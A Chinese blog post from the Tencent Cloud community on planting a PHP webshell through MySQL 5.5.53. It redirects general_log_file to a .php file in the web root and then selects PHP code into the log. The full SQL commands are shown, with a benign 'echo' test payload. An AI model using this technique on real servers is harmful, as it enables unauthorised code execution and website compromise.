前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >mysql利用log写入webshell(测试版本5.5.53)

mysql利用log写入webshell(测试版本5.5.53)

作者头像
C4rpeDime
发布2018-10-12 10:05:52
2.4K1
发布2018-10-12 10:05:52
举报
文章被收录于专栏:黑白安全

0x01    前言

新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话

mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)

此时在mysql文件夹下的my.ini中可以设置到处路径

mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)

但是在拿shell时,不可能去修改配置文件

可以通过修改mysql的log文件来获取webshell

0x02    过程

首先进入SQL环境,执行以下SQL语句:

show variables like "%general%";

mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)

修改如上两个地方的值,其中修改log的地址为网站目录下的php文件,其后log文件会写入其中,修改方法

代码语言:javascript
复制
set global general_log = on;set global general_log_file = "C:/phpStudy/PHPTutorial/MySQL/6.php";

 然后执行

代码语言:javascript
复制
select "<?php echo 12344;?>"

此时在网站目录下6.PHP中就生成了一句话

mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)
mysql利用log写入webshell(测试版本5.5.53)

成功执行。

添加收藏

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01    前言
  • 0x02    过程
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档